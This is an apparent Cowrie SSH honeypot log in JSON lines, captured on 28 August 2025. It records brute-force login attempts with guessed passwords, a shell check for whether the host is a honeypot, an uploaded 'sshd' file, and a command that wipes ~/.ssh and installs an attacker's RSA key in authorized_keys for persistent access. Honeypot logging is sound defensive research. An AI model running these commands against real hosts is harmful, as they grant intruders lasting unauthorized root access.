{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-08-28T16:19:07.018170Z","src_ip":"212.227.235.229","session":"099d131bbcab"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin@2","message":"login attempt [root/Admin@2] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:19:08.176397Z","src_ip":"212.227.235.229","session":"099d131bbcab"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:19:08.599394Z","src_ip":"212.227.235.229","session":"099d131bbcab"}
{"eventid":"cowrie.command.input","input":"cpu=$(grep 'model name' /proc/cpuinfo 2>/dev/null || echo \"\"); memtotal=$(grep MemTotal /proc/meminfo 2>/dev/null || echo \"\"); if [ -z \"$cpu\" ] || [ -z \"$memtotal\" ]; then;   echo \"honeypot\"; else;   echo \"valid\"; fi","message":"CMD: cpu=$(grep 'model name' /proc/cpuinfo 2>/dev/null || echo \"\"); memtotal=$(grep MemTotal /proc/meminfo 2>/dev/null || echo \"\"); if [ -z \"$cpu\" ] || [ -z \"$memtotal\" ]; then;   echo \"honeypot\"; else;   echo \"valid\"; fi","sensor":"my-vps","timestamp":"2025-08-28T16:19:08.600126Z","src_ip":"212.227.235.229","session":"099d131bbcab"}
{"eventid":"cowrie.command.input","input":"grep model name /proc/cpuinfo 2 > /dev/null","message":"CMD: grep model name /proc/cpuinfo 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T16:19:08.600581Z","src_ip":"212.227.235.229","session":"099d131bbcab"}
{"eventid":"cowrie.command.input","input":"echo","message":"CMD: echo","sensor":"my-vps","timestamp":"2025-08-28T16:19:08.603158Z","src_ip":"212.227.235.229","session":"099d131bbcab"}
{"eventid":"cowrie.command.input","input":"grep MemTotal /proc/meminfo 2 > /dev/null","message":"CMD: grep MemTotal /proc/meminfo 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T16:19:08.604310Z","src_ip":"212.227.235.229","session":"099d131bbcab"}
{"eventid":"cowrie.command.input","input":"echo","message":"CMD: echo","sensor":"my-vps","timestamp":"2025-08-28T16:19:08.605977Z","src_ip":"212.227.235.229","session":"099d131bbcab"}
{"eventid":"cowrie.command.failed","input":"if [ -z ]","message":"Command not found: if [ -z ]","sensor":"my-vps","timestamp":"2025-08-28T16:19:08.607239Z","src_ip":"212.227.235.229","session":"099d131bbcab"}
{"eventid":"cowrie.command.failed","input":"[ -z ]","message":"Command not found: [ -z ]","sensor":"my-vps","timestamp":"2025-08-28T16:19:08.608582Z","src_ip":"212.227.235.229","session":"099d131bbcab"}
{"eventid":"cowrie.command.failed","input":"then","message":"Command not found: then","sensor":"my-vps","timestamp":"2025-08-28T16:19:08.609681Z","src_ip":"212.227.235.229","session":"099d131bbcab"}
{"eventid":"cowrie.command.failed","input":"else","message":"Command not found: else","sensor":"my-vps","timestamp":"2025-08-28T16:19:08.611316Z","src_ip":"212.227.235.229","session":"099d131bbcab"}
{"eventid":"cowrie.command.failed","input":"fi","message":"Command not found: fi","sensor":"my-vps","timestamp":"2025-08-28T16:19:08.612452Z","src_ip":"212.227.235.229","session":"099d131bbcab"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","shasum":"070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","destfile":"/dev/null","message":"Saved redir contents with SHA-256 070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac to var/lib/cowrie/downloads/070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","sensor":"my-vps","timestamp":"2025-08-28T16:19:08.790913Z","src_ip":"212.227.235.229","session":"099d131bbcab"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104","size":289,"shasum":"69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:19:08.791786Z","src_ip":"212.227.235.229","session":"099d131bbcab"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:19:09.169894Z","src_ip":"212.227.235.229","session":"099d131bbcab"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34690,"dst_ip":"1.2.3.4","dst_port":22,"session":"57c604349853","protocol":"ssh","message":"New connection: 212.227.235.229:34690 (1.2.3.4:22) [session: 57c604349853]","sensor":"my-vps","timestamp":"2025-08-28T16:20:02.244293Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:20:02.245558Z","src_ip":"212.227.235.229","session":"57c604349853"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:20:02.551976Z","src_ip":"212.227.235.229","session":"57c604349853"}
{"eventid":"cowrie.login.failed","username":"luke","password":"luke","message":"login attempt [luke/luke] failed","sensor":"my-vps","timestamp":"2025-08-28T16:20:03.819114Z","src_ip":"212.227.235.229","session":"57c604349853"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:20:05.127243Z","src_ip":"212.227.235.229","session":"57c604349853"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":63222,"dst_ip":"1.2.3.4","dst_port":22,"session":"77e853014813","protocol":"ssh","message":"New connection: 217.72.205.35:63222 (1.2.3.4:22) [session: 77e853014813]","sensor":"my-vps","timestamp":"2025-08-28T16:20:17.454988Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:20:17.456226Z","src_ip":"217.72.205.35","session":"77e853014813"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55956,"dst_ip":"1.2.3.4","dst_port":22,"session":"477d07c7fe34","protocol":"ssh","message":"New connection: 212.227.235.229:55956 (1.2.3.4:22) [session: 477d07c7fe34]","sensor":"my-vps","timestamp":"2025-08-28T16:21:24.834225Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:21:24.835331Z","src_ip":"212.227.235.229","session":"477d07c7fe34"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:21:25.140541Z","src_ip":"212.227.235.229","session":"477d07c7fe34"}
{"eventid":"cowrie.login.failed","username":"rover","password":"rover","message":"login attempt [rover/rover] failed","sensor":"my-vps","timestamp":"2025-08-28T16:21:26.406249Z","src_ip":"212.227.235.229","session":"477d07c7fe34"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:21:27.714408Z","src_ip":"212.227.235.229","session":"477d07c7fe34"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":28803,"dst_ip":"1.2.3.4","dst_port":22,"session":"dc1576739871","protocol":"ssh","message":"New connection: 212.227.235.229:28803 (1.2.3.4:22) [session: dc1576739871]","sensor":"my-vps","timestamp":"2025-08-28T16:21:34.220323Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T16:21:34.221093Z","src_ip":"212.227.235.229","session":"dc1576739871"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T16:21:34.359766Z","src_ip":"212.227.235.229","session":"dc1576739871"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T16:21:34.953155Z","src_ip":"212.227.235.229","session":"dc1576739871"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:21:36.083263Z","src_ip":"212.227.235.229","session":"dc1576739871"}
{"eventid":"cowrie.session.file_upload","filename":"sshd","outfile":"var/lib/cowrie/downloads/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","message":"SFTP Uploaded file \"sshd\" to var/lib/cowrie/downloads/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","sensor":"my-vps","timestamp":"2025-08-28T16:22:11.443047Z","src_ip":"195.154.203.16","session":"004a89688878"}
{"eventid":"cowrie.session.closed","duration":"300.2","message":"Connection lost after 300.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:22:11.443705Z","src_ip":"195.154.203.16","session":"004a89688878"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":62992,"dst_ip":"1.2.3.4","dst_port":22,"session":"b94062cdaece","protocol":"ssh","message":"New connection: 212.227.235.229:62992 (1.2.3.4:22) [session: b94062cdaece]","sensor":"my-vps","timestamp":"2025-08-28T16:22:38.995180Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T16:22:38.996115Z","src_ip":"212.227.235.229","session":"b94062cdaece"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T16:22:39.160674Z","src_ip":"212.227.235.229","session":"b94062cdaece"}
{"eventid":"cowrie.login.failed","username":"user","password":"thompson","message":"login attempt [user/thompson] failed","sensor":"my-vps","timestamp":"2025-08-28T16:22:39.877475Z","src_ip":"212.227.235.229","session":"b94062cdaece"}
{"eventid":"cowrie.login.failed","username":"user","password":"simba","message":"login attempt [user/simba] failed","sensor":"my-vps","timestamp":"2025-08-28T16:22:41.013558Z","src_ip":"212.227.235.229","session":"b94062cdaece"}
{"eventid":"cowrie.login.failed","username":"user","password":"scream","message":"login attempt [user/scream] failed","sensor":"my-vps","timestamp":"2025-08-28T16:22:42.177196Z","src_ip":"212.227.235.229","session":"b94062cdaece"}
{"eventid":"cowrie.login.failed","username":"user","password":"q1q1q1","message":"login attempt [user/q1q1q1] failed","sensor":"my-vps","timestamp":"2025-08-28T16:22:43.346902Z","src_ip":"212.227.235.229","session":"b94062cdaece"}
{"eventid":"cowrie.login.failed","username":"user","password":"primus","message":"login attempt [user/primus] failed","sensor":"my-vps","timestamp":"2025-08-28T16:22:44.489622Z","src_ip":"212.227.235.229","session":"b94062cdaece"}
{"eventid":"cowrie.session.closed","duration":"6.6","message":"Connection lost after 6.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:22:45.624420Z","src_ip":"212.227.235.229","session":"b94062cdaece"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36052,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef8eb37da3ed","protocol":"ssh","message":"New connection: 212.227.235.229:36052 (1.2.3.4:22) [session: ef8eb37da3ed]","sensor":"my-vps","timestamp":"2025-08-28T16:23:05.376221Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:23:05.377002Z","src_ip":"212.227.235.229","session":"ef8eb37da3ed"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:23:05.555232Z","src_ip":"212.227.235.229","session":"ef8eb37da3ed"}
{"eventid":"cowrie.login.success","username":"root","password":"2wsx#EDC$RFV","message":"login attempt [root/2wsx#EDC$RFV] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:23:06.309661Z","src_ip":"212.227.235.229","session":"ef8eb37da3ed"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:23:06.680114Z","src_ip":"212.227.235.229","session":"ef8eb37da3ed"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T16:23:06.680833Z","src_ip":"212.227.235.229","session":"ef8eb37da3ed"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T16:23:06.681944Z","src_ip":"212.227.235.229","session":"ef8eb37da3ed"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:23:06.861332Z","src_ip":"212.227.235.229","session":"ef8eb37da3ed"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:23:07.280287Z","src_ip":"212.227.235.229","session":"ef8eb37da3ed"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T16:23:07.281253Z","src_ip":"212.227.235.229","session":"ef8eb37da3ed"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T16:23:07.462251Z","src_ip":"212.227.235.229","session":"ef8eb37da3ed"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:23:07.463257Z","src_ip":"212.227.235.229","session":"ef8eb37da3ed"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40732,"dst_ip":"1.2.3.4","dst_port":22,"session":"3f86b0d192f8","protocol":"ssh","message":"New connection: 212.227.235.229:40732 (1.2.3.4:22) [session: 3f86b0d192f8]","sensor":"my-vps","timestamp":"2025-08-28T16:23:07.608918Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:23:07.609629Z","src_ip":"212.227.235.229","session":"3f86b0d192f8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:23:07.770357Z","src_ip":"212.227.235.229","session":"3f86b0d192f8"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T16:23:08.452221Z","src_ip":"212.227.235.229","session":"3f86b0d192f8"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:23:09.615836Z","src_ip":"212.227.235.229","session":"3f86b0d192f8"}
